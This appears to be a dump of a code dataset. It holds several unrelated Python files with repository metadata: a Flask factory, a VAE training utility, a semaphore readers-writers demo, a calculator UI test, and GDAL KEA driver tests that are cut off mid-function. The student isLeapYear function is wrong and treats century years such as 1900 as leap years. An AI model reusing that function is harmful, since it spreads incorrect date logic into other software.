from .handlers import front
from jobplus.models import db
def create_app(config):
app = Flask(__name__)
app.config.from_object(configs.get(config))
db.init_app(app)
Migrate(app,db)
app.register_blueprint(front)
return app
| [
"1195581533@qq.com"
] | 1195581533@qq.com |
ef21f8305b1e4ef83d17f3b644b05e38dec6dd3a | 6cf74f8f1b203441e2964e5088e774c4ab973166 | /reviousNum.py | 796e09daef4907225c8c8d4c0cb4a32d9680751d | [] | no_license | KaiTang26/algo_lab | 50f6467610f5ce86080565dcf2b41f3cfbd8fe41 | aedd4d17b5b89b020a94268d2be963abc7743260 | refs/heads/master | 2023-01-09T08:17:18.965158 | 2020-01-31T15:52:52 | 2020-01-31T15:52:52 | 234,395,429 | 0 | 0 | null | 2023-01-05T06:11:06 | 2020-01-16T19:28:45 | JavaScript | UTF-8 | Python | false | false | 330 | py | def reverseNum(num):
digit_1 = num%10
digit_3 = num // 100
digit_2 = (num%100) //10
result = digit_1*100 + digit_2 *10 +digit_3
print(result)
def isLeapYear(yr):
print(yr % 100)
if((not(yr % 100 ==0) and (yr%400==0)) or (yr % 4 == 0 ) ):
return True
return False
print(list(range(10,0,-2)))
| [
"16kt16@queensu.ca"
] | 16kt16@queensu.ca |
7b71b890968014896983304e32911154a7972598 | dd91782c3983c25aa3b854d7e75f01053640fa73 | /scripts/test_clac.py | ff42242d3d0e273b90f6f48184d9ad41f1720527 | [] | no_license | wp520133/sum | 652bcfcc185a3e3aa235ea1301e55413034ab45f | e3831910495fb074eb7e97fb51e52baf653f6301 | refs/heads/master | 2022-10-07T01:30:05.490675 | 2020-06-11T14:48:58 | 2020-06-11T14:48:58 | 271,539,147 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | import unittest
from page.page_clac import PageClac
from parameterized import parameterized
from tools.read_txt import read_txt
from base.get_driver import GetDriver
import pytest
import allure
class TestClac(unittest.TestCase):
driver = None
@classmethod
def setUpClass(cls) -> None:
cls.driver = GetDriver().get_driver()
cls.clac = PageClac(cls.driver)
@classmethod
def tearDownClass(cls) -> None:
GetDriver().quit_driver()
# @parameterized.expand(read_txt("data.txt"))
@allure.step(title="计算")
def test_add_clac(self):
self.clac.page_add_clac(1, 2)
if __name__ == '__main__':
pytest.main()
| [
"17327767735@163.com"
] | 17327767735@163.com |
34c235b15d381ca4e50eb70514ac45360134f6d5 | b2da7cdef0e2214f35554a2624b2c48379f9ea0e | /src/utils.py | cb04da45a3eb24ce72dbe8c88cbae36d02529162 | [
"MIT"
] | permissive | FaisalAhmed0/variational-autoencoder | 9aa2afa7e40fc1aad32dc2f5abb763e2fd0c9014 | a6c1c96da8063d822aef2e2bdd69d7cb1b35c2cd | refs/heads/main | 2023-08-14T18:34:38.605110 | 2021-10-03T00:40:34 | 2021-10-03T00:40:34 | 397,566,185 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,588 | py | import torch
import torch.nn.functional as F
from torchvision.utils import make_grid
import matplotlib.pyplot as plt
def vae_loss(logvar_z, mean_z, output, target, batch_size, mse=True):
# KL Divergence between the prior and the posterior
kl_divergence = - 0.5 * (torch.sum(1 + logvar_z - mean_z.pow(2) - logvar_z.exp(), dim=1)).sum()
# reconstruction loss
if mse:
reconstruction_loss = F.mse_loss(output, target, reduction="sum")
else:
reconstruction_loss = F.binary_cross_entropy(output, target, reduction="sum")
loss = (1/batch_size) * (kl_divergence + reconstruction_loss)
return loss
# simple function to implemenet the reparametrization trick
def reparametrization(mean, logv, device):
eps = torch.randn_like(mean, device=device)
z = mean + eps * logv.exp().pow(0.5)
return z
def train(encoder, decoder, loss, optimizer, dataloader, epochs, testloader, channels=1, height=28, width=28, plot=False, mse=False, activation=True, data="mnist", plot_freq=10, device='cpu'):
losses = []
test_losses = []
# Main training loop
for epoch in range(epochs):
for img, _ in dataloader:
if data == "freyface":
img_flattend = img.reshape(-1, (torch.tensor(img.shape[1:])).prod()).to(torch.float32)
else:
img_flattend = img.reshape(-1, (torch.tensor(img.shape[1:])).prod())
mu, logv = encoder(img_flattend.to(device))
z = reparametrization(mu, logv, device)
if activation:
output = decoder(z.to(device), torch.sigmoid)
else:
output = decoder(z.to(device))
loss = vae_loss(logv.to(device), mu.to(device), output.to(device), img_flattend.to(device), len(img), mse=mse)
optimizer.zero_grad()
loss.backward()
optimizer.step()
losses.append(-loss)
# plot some results every 10 epochs
if (epoch+1) % plot_freq == 0 :
targets = img[:10]
output_reshaped = output.reshape(-1, channels, height, width)[:10]
target_grid = make_grid(targets.cpu().detach(), nrow=10)
if mse:
output_grid = make_grid(output_reshaped.cpu().detach().to(torch.int32), nrow=10)
else:
output_grid = make_grid(output_reshaped.cpu().detach(), nrow=10)
if plot:
plt.figure(figsize=(15, 10))
plt.imshow(target_grid.permute(1, 2, 0))
plt.figure(figsize=(15, 10))
plt.imshow(output_grid.permute(1, 2, 0))
plt.show()
# evaluate on the test set
with torch.no_grad():
for img, _ in testloader:
if data == "freyface":
img_flattend = img.reshape(-1, (torch.tensor(img.shape[1:])).prod()).to(torch.float32)
else:
img_flattend = img.reshape(-1, (torch.tensor(img.shape[1:])).prod())
mu, logv = encoder(img_flattend.to(device))
z = reparametrization(mu, logv, device)
if activation:
output = decoder(z.to(device), torch.sigmoid)
else:
output = decoder(z.to(device))
test_loss = vae_loss(logv.to(device), mu.to(device), output.to(device), img_flattend.to(device), len(img), mse=mse)
# test_loss = vae_loss(logv.to(device), mu.to(device), output.to(device), img_flattend.to(device), 60000, len(img), mse=False)
test_losses.append(- test_loss)
print(f"Epoch: {epoch+1}, train loss: {loss}, test loss: {test_loss}")
return losses, test_losses, target_grid, output_grid
# plot a batch of images as a grid.
def plot_grid(dataloader):
images, _ = next(iter(dataloader))
grid = make_grid(images, )
plt.figure(figsize=(10, 10))
plt.imshow(grid.permute(1, 2, 0))
| [
"noreply@github.com"
] | FaisalAhmed0.noreply@github.com |
8ccba5973dc92209878232bd5232bebd2f5d5879 | fd38e7f2a3c4113170f149bd8a5a2f481e799442 | /Cvicenie 03/readers_writers_starvation_prevention.py | 6b2b86487ae451422520c8f7ed2ee985d4717d97 | [] | no_license | Meidie/fei-ppds | 1424efcf8357de8267c2e23589c9c92bbd8543de | 4cf37fde561ed78513b0812d2174a76e22132d9c | refs/heads/main | 2023-05-06T09:14:10.688689 | 2021-05-03T21:08:27 | 2021-05-03T21:08:27 | 339,423,215 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,860 | py | from fei.ppds import Thread, Semaphore, print, randint
from light_switch import LightSwitch
from time import sleep
NUMBER_OF_READERS = 5
NUMBER_OF_WRITERS = 5
class Room:
def __init__(self):
self.light_switch = LightSwitch()
self.room_empty = Semaphore(1)
self.turnstile = Semaphore(1) # turnstile to prevent starvation
def read(room, thread_id):
while True:
sleep(randint(0, 1) / 10)
room.turnstile.wait()
room.turnstile.signal()
room.light_switch.lock(room.room_empty)
(print("Thread [{0}] started reading, {1} threads reading".format(
thread_id, room.light_switch.counter))
if room.light_switch.counter != 1
else print("Thread [{0}] started reading, {1} thread reading".format(
thread_id, room.light_switch.counter)))
sleep(randint(0, 10) / 100)
room.light_switch.unlock(room.room_empty)
(print("Thread [{0}] finished reading, {1} threads reading".format(
thread_id, room.light_switch.counter))
if room.light_switch.counter != 1
else print("Thread [{0}] finished reading, {1} thread reading".format(
thread_id, room.light_switch.counter)))
def write(room, thread_id):
while True:
sleep(randint(0, 1) / 10)
room.turnstile.wait()
room.room_empty.wait()
print("Thread [%d] started writing" % thread_id)
sleep(randint(0, 10) / 100)
room.room_empty.signal()
room.turnstile.signal()
print("Thread [%d] finished writing" % thread_id)
room = Room()
readers = list()
writers = list()
for i in range(NUMBER_OF_READERS):
readers.append(Thread(read, room, i))
for j in range(NUMBER_OF_WRITERS):
writers.append(Thread(write, room, j))
for r in readers:
r.join()
for w in writers:
w.join()
| [
"matuspohancenik@gmail.com"
] | matuspohancenik@gmail.com |
395a613eb3e609cee767e7968520bf8a85f08f74 | 68709668d94e914fd6e1ee2011a5291cf8d07fca | /mod_data.py | 3c2bf12bf0ac904712efd33b7b694f06d6b66dba | [] | no_license | dukererenst/Coin-Prediction | 387256c3f9be9634f73e27c6f0ca83529bf8799a | 28dce6ce03d2a1d23e4a93f2dfa4244c85417e1c | refs/heads/master | 2020-03-27T18:28:32.157717 | 2017-11-20T04:59:04 | 2017-11-20T04:59:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,194 | py | import numpy as np
from random import shuffle
filename = "/home/stan/Projects/TensorFlow/coin-prediction/data/condensed/data_just_24h.csv"
offset = 288
def sample_handling(sample):
featureset = []
input_data = []
output_data = []
global offset
with open(sample, 'r') as f:
contents = f.readlines()
hm_lines = len(contents)-offset
for l in contents[1:hm_lines]:
l = l.strip().split(',')
input_data.append(l)
for l in contents[offset+1:len(contents)]:
l = l.strip().split(',')
output_data.append(l)
for i in range(len(input_data)):
featureset.append([input_data[i], output_data[i]])
print(len(featureset))
return featureset
def create_feature_sets_and_labels(test_size = .1):
global filename
featureset = []
featureset += sample_handling(filename)
shuffle(featureset)
testing_size = int(test_size * len(featureset))
print(testing_size)
train_x = [item[0] for item in featureset[:-testing_size]]
train_y = [item[1] for item in featureset[:-testing_size]]
test_x = [item[0] for item in featureset[-testing_size:]]
test_y = [item[1] for item in featureset[-testing_size:]]
return train_x,train_y,test_x,test_y
#create_feature_sets_and_labels() | [
"clinestanford@gmail.com"
] | clinestanford@gmail.com |
6808a79a41526dcd13328e520ccf4ed137afc868 | 0feec97d29377f419d0e4e160b589f094d7493df | /autotest/gdrivers/kea.py | ec95f2f2520c9bd57a506dc29a6cf83f7039f2af | [
"MIT"
] | permissive | Komzpa/gdal | 305176b1146cb4a9783cc17eb1308a8d2ac4a093 | 9ab85be2cc927a34d6fdf311e803aeaf7362fba3 | refs/heads/trunk | 2020-12-28T19:11:33.810933 | 2015-04-04T23:38:45 | 2015-04-04T23:38:45 | 33,422,287 | 0 | 1 | null | 2015-04-04T22:18:40 | 2015-04-04T22:18:40 | null | UTF-8 | Python | false | false | 30,081 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id $
#
# Project: GDAL/OGR Test Suite
# Purpose: Test KEA driver
# Author: Even Rouault, <even dot rouault at spatialys dot com>
#
###############################################################################
# Copyright (c) 2014, Even Rouault <even dot rouault at spatialys dot com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
from osgeo import gdal
sys.path.append( '../pymod' )
import gdaltest
###############################################################################
def kea_init():
try:
gdaltest.kea_driver = gdal.GetDriverByName('KEA')
except:
gdaltest.kea_driver = None
return 'success'
###############################################################################
# Test copying a reference sample with CreateCopy()
def kea_1():
if gdaltest.kea_driver is None:
return 'skip'
tst = gdaltest.GDALTest( 'KEA', 'byte.tif', 1, 4672, options = ['IMAGEBLOCKSIZE=15', 'THEMATIC=YES'] )
return tst.testCreateCopy( check_srs = True, check_gt = 1 )
###############################################################################
# Test CreateCopy() for various data types
def kea_2():
if gdaltest.kea_driver is None:
return 'skip'
src_files = [ 'byte.tif',
'int16.tif',
'../../gcore/data/uint16.tif',
'../../gcore/data/int32.tif',
'../../gcore/data/uint32.tif',
'../../gcore/data/float32.tif',
'../../gcore/data/float64.tif' ]
for src_file in src_files:
tst = gdaltest.GDALTest( 'KEA', src_file, 1, 4672 )
ret = tst.testCreateCopy( check_minmax = 1 )
if ret != 'success':
return ret
return 'success'
###############################################################################
# Test Create() for various data types
def kea_3():
if gdaltest.kea_driver is None:
return 'skip'
src_files = [ 'byte.tif',
'int16.tif',
'../../gcore/data/uint16.tif',
'../../gcore/data/int32.tif',
'../../gcore/data/uint32.tif',
'../../gcore/data/float32.tif',
'../../gcore/data/float64.tif' ]
for src_file in src_files:
tst = gdaltest.GDALTest( 'KEA', src_file, 1, 4672 )
ret = tst.testCreate( out_bands = 1, check_minmax = 1 )
if ret != 'success':
return ret
return 'success'
###############################################################################
# Test Create()/CreateCopy() error cases or limit cases
def kea_4():
if gdaltest.kea_driver is None:
return 'skip'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ds = gdaltest.kea_driver.Create("/non_existing_path", 1, 1)
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
src_ds = gdaltest.kea_driver.Create('tmp/src.kea', 1, 1, 0)
if src_ds is None:
gdaltest.post_reason('fail')
return 'fail'
ds = gdaltest.kea_driver.CreateCopy("tmp/out.kea", src_ds)
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterCount != 0:
gdaltest.post_reason('fail')
return 'fail'
src_ds = None
ds = None
# Test updating a read-only file
ds = gdaltest.kea_driver.Create('tmp/out.kea', 1, 1)
ds.GetRasterBand(1).Fill(255)
ds = None
ds = gdal.Open('tmp/out.kea')
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.SetProjection('a')
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.SetGeoTransform([1,2,3,4,5,6])
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
# Disabled for now since some of them cause memory leaks or
# crash in the HDF5 library finalizer
if False:
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.SetMetadataItem('foo', 'bar')
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.SetMetadata({'foo': 'bar'})
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.GetRasterBand(1).SetMetadataItem('foo', 'bar')
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.GetRasterBand(1).SetMetadata({'foo': 'bar'})
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.SetGCPs([], "")
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.AddBand(gdal.GDT_Byte)
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
ds.GetRasterBand(1).WriteRaster(0,0,1,1,'\0')
gdal.ErrorReset()
gdal.PushErrorHandler('CPLQuietErrorHandler')
ds.FlushCache()
gdal.PopErrorHandler()
if ds.GetRasterBand(1).Checksum() != 3:
gdaltest.post_reason('fail')
return 'fail'
ds = None
gdaltest.kea_driver.Delete('tmp/src.kea')
gdaltest.kea_driver.Delete('tmp/out.kea')
return 'success'
###############################################################################
# Test Create() creation options
def kea_5():
if gdaltest.kea_driver is None:
return 'skip'
options = [ 'IMAGEBLOCKSIZE=15', 'ATTBLOCKSIZE=100', 'MDC_NELMTS=10',
'RDCC_NELMTS=256', 'RDCC_NBYTES=500000', 'RDCC_W0=0.5',
'SIEVE_BUF=32768', 'META_BLOCKSIZE=1024', 'DEFLATE=9', 'THEMATIC=YES' ]
ds = gdaltest.kea_driver.Create("tmp/out.kea", 100, 100, 3, options = options)
ds = None
ds = gdal.Open('tmp/out.kea')
if ds.GetRasterBand(1).GetBlockSize() != [15,15]:
gdaltest.post_reason('fail')
print(ds.GetRasterBand(1).GetBlockSize())
return 'failure'
if ds.GetRasterBand(1).GetMetadataItem('LAYER_TYPE') != 'thematic':
gdaltest.post_reason('fail')
print(ds.GetRasterBand(1).GetMetadata())
return 'failure'
if ds.GetRasterBand(1).Checksum() != 0:
gdaltest.post_reason('fail')
print(ds.GetRasterBand(1).Checksum())
return 'failure'
if ds.GetGeoTransform() != (0,1,0,0,0,-1):
gdaltest.post_reason('fail')
print(ds.GetGeoTransform())
return 'failure'
if ds.GetProjectionRef() != '':
gdaltest.post_reason('fail')
print(ds.GetProjectionRef())
return 'failure'
ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
return 'success'
###############################################################################
# Test metadata
def kea_6():
if gdaltest.kea_driver is None:
return 'skip'
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1, 5)
ds.SetMetadata( { 'foo':'bar' } )
ds.SetMetadataItem( 'bar', 'baw' )
ds.GetRasterBand(1).SetMetadata( { 'bar':'baz' } )
ds.GetRasterBand(1).SetDescription('desc')
ds.GetRasterBand(2).SetMetadata( { 'LAYER_TYPE' : 'any_string_that_is_not_athematic_is_thematic' } )
ds.GetRasterBand(3).SetMetadata( { 'LAYER_TYPE' : 'athematic' } )
ds.GetRasterBand(4).SetMetadataItem( 'LAYER_TYPE', 'thematic' )
ds.GetRasterBand(5).SetMetadataItem( 'LAYER_TYPE', 'athematic' )
if ds.SetMetadata( { 'foo':'bar' }, 'other_domain' ) == 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.SetMetadataItem( 'foo', 'bar', 'other_domain' ) == 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).SetMetadata( { 'foo':'bar' }, 'other_domain' ) == 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).SetMetadataItem( 'foo', 'bar', 'other_domain' ) == 0:
gdaltest.post_reason('fail')
return 'fail'
ds = None
ds = gdal.Open('tmp/out.kea')
if ds.GetMetadata('other_domain') != {}:
gdaltest.post_reason('fail')
print(ds.GetMetadata('other_domain'))
return 'fail'
if ds.GetMetadataItem('item', 'other_domain') is not None:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).GetMetadata('other_domain') != {}:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).GetMetadataItem('item', 'other_domain') is not None:
gdaltest.post_reason('fail')
return 'fail'
md = ds.GetMetadata()
if md['foo'] != 'bar':
gdaltest.post_reason('fail')
print(md)
return 'failure'
if ds.GetMetadataItem('foo') != 'bar':
gdaltest.post_reason('fail')
print(ds.GetMetadataItem('foo'))
return 'failure'
if ds.GetMetadataItem('bar') != 'baw':
gdaltest.post_reason('fail')
print(ds.GetMetadataItem('bar'))
return 'failure'
if ds.GetRasterBand(1).GetDescription() != 'desc':
gdaltest.post_reason('fail')
return 'failure'
md = ds.GetRasterBand(1).GetMetadata()
if md['bar'] != 'baz':
gdaltest.post_reason('fail')
print(md)
return 'failure'
if ds.GetRasterBand(1).GetMetadataItem('bar') != 'baz':
gdaltest.post_reason('fail')
print(ds.GetRasterBand(1).GetMetadataItem('bar'))
return 'failure'
if ds.GetRasterBand(2).GetMetadataItem('LAYER_TYPE') != 'thematic':
gdaltest.post_reason('fail')
print(ds.GetRasterBand(2).GetMetadataItem('LAYER_TYPE'))
return 'failure'
if ds.GetRasterBand(3).GetMetadataItem('LAYER_TYPE') != 'athematic':
gdaltest.post_reason('fail')
print(ds.GetRasterBand(3).GetMetadataItem('LAYER_TYPE'))
return 'failure'
if ds.GetRasterBand(4).GetMetadataItem('LAYER_TYPE') != 'thematic':
gdaltest.post_reason('fail')
print(ds.GetRasterBand(4).GetMetadataItem('LAYER_TYPE'))
return 'failure'
if ds.GetRasterBand(5).GetMetadataItem('LAYER_TYPE') != 'athematic':
gdaltest.post_reason('fail')
print(ds.GetRasterBand(5).GetMetadataItem('LAYER_TYPE'))
return 'failure'
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
ds = None
if out2_ds.GetMetadataItem('foo') != 'bar':
gdaltest.post_reason('fail')
print(out2_ds.GetMetadataItem('foo'))
return 'failure'
if out2_ds.GetRasterBand(1).GetMetadataItem('bar') != 'baz':
gdaltest.post_reason('fail')
print(out2_ds.GetRasterBand(1).GetMetadataItem('bar'))
return 'failure'
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test georef
def kea_7():
if gdaltest.kea_driver is None:
return 'skip'
# Geotransform
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1)
if ds.GetGCPCount() != 0:
gdaltest.post_reason('fail')
return 'failure'
if ds.SetGeoTransform([1,2,3,4,5,6]) != 0:
gdaltest.post_reason('fail')
return 'failure'
if ds.SetProjection('foo') != 0:
gdaltest.post_reason('fail')
return 'failure'
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
ds = None
if out2_ds.GetGCPCount() != 0:
gdaltest.post_reason('fail')
return 'failure'
if out2_ds.GetGeoTransform() != (1,2,3,4,5,6):
gdaltest.post_reason('fail')
print(out2_ds.GetGeoTransform())
return 'failure'
if out2_ds.GetProjectionRef() != 'foo':
gdaltest.post_reason('fail')
print(out2_ds.GetProjectionRef())
return 'failure'
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
# GCP
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1)
gcp1 = gdal.GCP(0,1,2,3,4)
gcp1.Id = "id"
gcp1.Info = "info"
gcp2 = gdal.GCP(0,1,2,3,4)
gcps = [ gcp1, gcp2 ]
ds.SetGCPs(gcps, "foo")
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
ds = None
if out2_ds.GetGCPCount() != 2:
gdaltest.post_reason('fail')
return 'failure'
if out2_ds.GetGCPProjection() != 'foo':
gdaltest.post_reason('fail')
return 'failure'
got_gcps = out2_ds.GetGCPs()
for i in range(2):
if got_gcps[i].GCPX != gcps[i].GCPX or got_gcps[i].GCPY != gcps[i].GCPY or \
got_gcps[i].GCPZ != gcps[i].GCPZ or got_gcps[i].GCPPixel != gcps[i].GCPPixel or \
got_gcps[i].GCPLine != gcps[i].GCPLine or got_gcps[i].Id != gcps[i].Id or \
got_gcps[i].Info != gcps[i].Info:
print(i)
print(got_gcps[i])
gdaltest.post_reason('fail')
return 'failure'
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test colortable
def kea_8():
if gdaltest.kea_driver is None:
return 'skip'
for i in range(2):
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1)
if ds.GetRasterBand(1).GetColorTable() is not None:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).SetColorTable( None ) == 0: # not allowed by the driver
gdaltest.post_reason('fail')
return 'fail'
ct = gdal.ColorTable()
ct.SetColorEntry( 0, (0,255,0,255) )
ct.SetColorEntry( 1, (255,0,255,255) )
ct.SetColorEntry( 2, (0,0,255,255) )
if ds.GetRasterBand(1).SetColorTable( ct ) != 0:
gdaltest.post_reason('fail')
return 'fail'
if i == 1:
# And again
if ds.GetRasterBand(1).SetColorTable( ct ) != 0:
gdaltest.post_reason('fail')
return 'fail'
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
ds = None
got_ct = out2_ds.GetRasterBand(1).GetColorTable()
if got_ct.GetCount() != 3:
gdaltest.post_reason( 'Got wrong color table entry count.' )
return 'fail'
if got_ct.GetColorEntry(1) != (255,0,255,255):
gdaltest.post_reason( 'Got wrong color table entry.' )
return 'fail'
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test color interpretation
def kea_9():
if gdaltest.kea_driver is None:
return 'skip'
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1, gdal.GCI_YCbCr_CrBand - gdal.GCI_GrayIndex + 1)
if ds.GetRasterBand(1).GetColorInterpretation() != gdal.GCI_GrayIndex:
gdaltest.post_reason('fail')
return 'fail'
for i in range(gdal.GCI_GrayIndex, gdal.GCI_YCbCr_CrBand + 1):
ds.GetRasterBand(i).SetColorInterpretation(i)
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
ds = None
for i in range(gdal.GCI_GrayIndex, gdal.GCI_YCbCr_CrBand + 1):
if out2_ds.GetRasterBand(i).GetColorInterpretation() != i:
gdaltest.post_reason( 'Got wrong color interpreation.' )
print(i)
print(out2_ds.GetRasterBand(i).GetColorInterpretation())
return 'fail'
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test nodata
def kea_10():
if gdaltest.kea_driver is None:
return 'skip'
for (dt,nd,expected_nd) in [ (gdal.GDT_Byte,0,0),
(gdal.GDT_Byte,1.1,1.0),
(gdal.GDT_Byte,255,255),
(gdal.GDT_Byte,-1,None),
(gdal.GDT_Byte,256,None),
(gdal.GDT_UInt16,0,0),
(gdal.GDT_UInt16,65535,65535),
(gdal.GDT_UInt16,-1,None),
(gdal.GDT_UInt16,65536,None),
(gdal.GDT_Int16,-32768,-32768),
(gdal.GDT_Int16,32767,32767),
(gdal.GDT_Int16,-32769,None),
(gdal.GDT_Int16,32768,None),
(gdal.GDT_UInt32,0,0),
(gdal.GDT_UInt32,0xFFFFFFFF,0xFFFFFFFF),
(gdal.GDT_UInt32,-1,None),
(gdal.GDT_UInt32,0xFFFFFFFF+1,None),
(gdal.GDT_Int32,-2147483648,-2147483648),
(gdal.GDT_Int32,2147483647,2147483647),
(gdal.GDT_Int32,-2147483649,None),
(gdal.GDT_Int32,2147483648,None),
(gdal.GDT_Float32,0.5,0.5),
]:
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1, 1, dt)
if ds.GetRasterBand(1).GetNoDataValue() is not None:
gdaltest.post_reason('fail')
return 'fail'
ds.GetRasterBand(1).SetNoDataValue(nd)
if ds.GetRasterBand(1).GetNoDataValue() != expected_nd:
gdaltest.post_reason( 'Got wrong nodata.' )
print(dt)
print(ds.GetRasterBand(1).GetNoDataValue())
return 'fail'
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
ds = None
if out2_ds.GetRasterBand(1).GetNoDataValue() != expected_nd:
gdaltest.post_reason( 'Got wrong nodata.' )
print(dt)
print(out2_ds.GetRasterBand(1).GetNoDataValue())
return 'fail'
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test AddBand
def kea_11():
if gdaltest.kea_driver is None:
return 'skip'
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1, 1, gdal.GDT_Byte)
ds = None
ds = gdal.Open('tmp/out.kea', gdal.GA_Update)
if ds.AddBand(gdal.GDT_Byte) != 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.AddBand(gdal.GDT_Int16, options = ['DEFLATE=9']) != 0:
gdaltest.post_reason('fail')
return 'fail'
ds = None
ds = gdal.Open('tmp/out.kea')
if ds.RasterCount != 3:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(2).DataType != gdal.GDT_Byte:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(3).DataType != gdal.GDT_Int16:
gdaltest.post_reason('fail')
return 'fail'
ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
return 'success'
###############################################################################
# Test RAT
def kea_12():
if gdaltest.kea_driver is None:
return 'skip'
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1, 1, gdal.GDT_Byte)
if ds.GetRasterBand(1).GetDefaultRAT().GetColumnCount() != 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).SetDefaultRAT( None ) == 0: # not allowed by the driver
gdaltest.post_reason('fail')
return 'fail'
rat = ds.GetRasterBand(1).GetDefaultRAT()
rat.CreateColumn('col_real_generic', gdal.GFT_Real, gdal.GFU_Generic)
if ds.GetRasterBand(1).SetDefaultRAT( rat ) != 0:
gdaltest.post_reason('fail')
return 'fail'
rat = ds.GetRasterBand(1).GetDefaultRAT()
rat.CreateColumn('col_integer_pixelcount', gdal.GFT_Real, gdal.GFU_PixelCount)
rat.CreateColumn('col_string_name', gdal.GFT_String, gdal.GFU_Name)
rat.CreateColumn('col_integer_red', gdal.GFT_Integer, gdal.GFU_Red)
rat.CreateColumn('col_integer_green', gdal.GFT_Integer, gdal.GFU_Green)
rat.CreateColumn('col_integer_blue', gdal.GFT_Integer, gdal.GFU_Blue)
rat.CreateColumn('col_integer_alpha', gdal.GFT_Integer, gdal.GFU_Alpha)
rat.SetRowCount(1)
rat.SetValueAsString(0,0,"1.23")
rat.SetValueAsInt(0,0,1)
rat.SetValueAsDouble(0,0,1.23)
